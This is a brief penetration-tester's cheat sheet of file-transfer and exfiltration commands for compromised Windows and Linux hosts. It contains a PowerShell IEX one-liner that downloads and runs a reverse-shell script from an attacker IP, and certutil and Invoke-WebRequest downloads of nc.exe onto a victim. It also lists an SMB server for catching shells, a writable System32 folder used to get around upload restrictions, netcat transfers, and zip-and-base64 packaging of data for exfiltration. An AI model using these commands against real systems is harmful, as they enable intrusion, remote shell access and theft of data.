Load PS1 in memory

powershell "IEX(New-Object Net.WebClient).downloadString('<http://192.168.119.122/Utilities/Revshells/shell.ps1>')"

Windows upload via certutil.exe

certutil.exe -split -urlcache -f <http://192.168.119.122/Utilities/Binaries/nc.exe>

Windows upload via powershell

powershell Invoke-WebRequest -Uri " <http://192.168.119.122/Utilities/Binaries/nc.exe>" -OutFile C:\\temp\\nc.exe

SMBServer is a good option for windows when dealing with firewalls and needing port 80 for catching shells

#Kali
smbserver.py -smb2support  a .
#Victim
\\\\IP\\a\\nc.exe

File Upload windows route bypass

C:\\Windows\\System32\\spool\\drivers\\color

Netcat Transfers

nc 10.10.10.15 4444 < file_to_transfer
nc -lvnp 4444 > file_to_transfer

SCP transfer (requires ssh access)

scp user@ip:/filename /path #from
scp filename user@ip:/path #to

Data exfiltration via base64

#Linux
zip -e -r exfil.zip dir_name
cat exfil.zip | base64 > exfil.txt
#Windows
powershell Compress-Archive -LiteralPath dir -DestinationPath ./exfil.zip
certuitl -encode exfil.zip exfil.txt